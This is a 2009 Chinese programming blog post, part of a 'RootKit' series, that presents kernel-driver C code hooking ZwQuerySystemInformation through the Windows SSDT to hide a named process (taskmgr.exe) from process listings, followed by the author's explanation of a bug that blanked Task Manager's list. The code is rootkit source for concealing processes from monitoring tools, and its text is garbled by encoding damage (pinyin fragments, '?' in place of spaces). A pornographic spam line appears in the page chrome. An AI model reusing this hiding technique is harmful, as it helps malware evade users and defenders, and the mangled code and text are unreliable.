S.l.e!ep.￠%

像打了激速一樣，以四倍的速度運(yùn)轉(zhuǎn)，開心的工作
簡單、開放、平等的公司文化；尊重個性、自由與個人價值；

posts - 1098, comments - 335, trackbacks - 0, articles - 1

C++博客 :: 首頁 :: 新隨筆 :: 聯(lián)系 :: 聚合

:: 管理

HOOK SSDT Hide Process （七）

Posted on 2009-10-27 17:32 S.l.e!ep.￠% 閱讀(333) 評論(0) 編輯收藏引用所屬分類: RootKit

[資料] http://m.shnenglu.com/sleepwom/archive/2009/10/24/99375.html

繼 HOOK SSDT Hide Process （六）??

下面這個函數(shù)有問題，運(yùn)行之后，Taskmgr.exe 里面的進(jìn)程列表估然顯示為空

NTSTATUS?MyZwQuerySystemInformation(IN?ULONG?SystemInformationClass,?
????????????????????????????????????IN?PVOID?SystemInformation,?
????????????????????????????????????IN?ULONG?SystemInformationLength,?
????????????????????????????????????OUT?PULONG?ReturnLength)? // 定義自己的Hook函數(shù)
{?
????
????NTSTATUS?rc;?
????UNICODE_STRING?process_name;
????
????RtlInitUnicodeString( & process_name,?L " taskmgr.exe " );
????
????rc? = ?(OldZwQuerySystemInformation)?(?
????????SystemInformationClass,?
????????SystemInformation,?
????????SystemInformationLength,?
????????ReturnLength);?
????
???? if (NT_SUCCESS(rc))?
????{
????????
???????? if ( 5 ? == ?SystemInformationClass)
????????{?
????????????
???????????? struct ?_SYSTEM_PROCESSES? * curr? = ?( struct ?_SYSTEM_PROCESSES? * )SystemInformation;?
???????????? struct ?_SYSTEM_PROCESSES? * prev? = ?NULL;?
????????????
???????????? if (curr -> NextEntryDelta)
????????????????curr? = ?(_SYSTEM_PROCESSES? * )((ULONG)curr? + ?curr -> NextEntryDelta);?
????????????
???????????? while (curr)
????????????{
???????????????? if ?(RtlEqualUnicodeString( & process_name,? & curr -> ProcessName,? 1 ))
????????????????{
????????????????????KdPrint(( " hide?process'name?taskmgr.exe " ));
????????????????????
???????????????????? if (prev)?
????????????????????{?
???????????????????????? if (curr -> NextEntryDelta)
????????????????????????{
????????????????????????????prev -> NextEntryDelta? += ?curr -> NextEntryDelta;
????????????????????????}?
???????????????????????? else
????????????????????????{
????????????????????????????prev -> NextEntryDelta? = ? 0 ;
????????????????????????}
????????????????????}
???????????????????? else
????????????????????{
???????????????????????? if (curr -> NextEntryDelta)
????????????????????????{
????????????????????????????SystemInformation? = (PVOID)((ULONG)SystemInformation? + ?curr -> NextEntryDelta);
????????????????????????}
???????????????????????? else
????????????????????????{
????????????????????????????SystemInformation? = ?NULL;
????????????????????????}
????????????????????}
????????????????????
???????????????????? if (curr -> NextEntryDelta)
????????????????????????curr? = ?(_SYSTEM_PROCESSES? * )((ULONG)curr? + ?curr -> NextEntryDelta);
???????????????????? else
????????????????????{
????????????????????????curr? = ?NULL;
???????????????????????? break ;
????????????????????}
????????????????????
????????????????}? // ?if?(RtlEqualUnicodeString(&process_name,?&curr->ProcessName,?1))
????????????????
???????????????? if (curr? != ?NULL)
????????????????{
????????????????????prev? = ?curr;
????????????????????
???????????????????? if (curr -> NextEntryDelta)
????????????????????????curr? = ?(_SYSTEM_PROCESSES? * )((ULONG)curr? + ?curr -> NextEntryDelta);
???????????????????? else
????????????????????????curr? = ?NULL;
????????????????????
????????????????} // ?if(curr?!=?NULL)
????????????????
????????????} // ?while(curr)?
????????????
????????} // ?if(5?==?SystemInformationClass)
????????
????} // ?if(NT_SUCCESS(rc))
????
???? // ?KdPrint(("HookZwQuerySystemInformation?is?Succeessfully

.?\n"));
???? return ?rc;
}

使用自己的查詢進(jìn)程EXE(HOOK SSDT Hide Process （五） )，顯示結(jié)果是正常的

驅(qū)動中判斷的是 taskmgr.exe?，在遍歷時，taskmgr.exe 剛好在最好一個，把 NextEntryDelta 設(shè)置為 0 了
如果是其它的 abc.exe ，然后再打開 taskmgr.exe 是沒問題的

看來，HOOK SSDT Hide Process （五）遍歷進(jìn)程的實(shí)現(xiàn) 跟 Taskmgr.exe 的實(shí)現(xiàn)有差異, 需要再找時間看下原因

從 MyZwQuerySystemInformation() 的實(shí)現(xiàn)來看，只是簡單地修改了下 NextEntryDelta ，并非真正意義上的'隱藏'
還是會把數(shù)據(jù)傳給用戶態(tài)。

只有注冊用戶登錄后才能發(fā)表評論。


相關(guān)文章: Load Driver protect_pwd.txt Windows下Hook API技術(shù) inline hook 對付API-splicing的一種簡單方法修改IAT實(shí)現(xiàn)API HOOK API-HOOK and ANTI-API-HOOK For Ring3 API Hook jmp 法 DirectX Input 鍵盤實(shí)現(xiàn) 收藏一個反鍵盤記錄工具的分析不用hook 實(shí)現(xiàn)掛機(jī)鎖

網(wǎng)站導(dǎo)航: 博客園 IT新聞 BlogJava 博問 Chat2DB 管理

青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品

S.l.e!ep.￠%

HOOK SSDT Hide Process （七）

日歷

公告

常用鏈接

留言簿(5)

隨筆分類(1107)

隨筆檔案(1098)

文章檔案(1)

相冊

收藏夾(3)

DataStruct

搜索

積分與排名

最新評論

閱讀排行榜

評論排行榜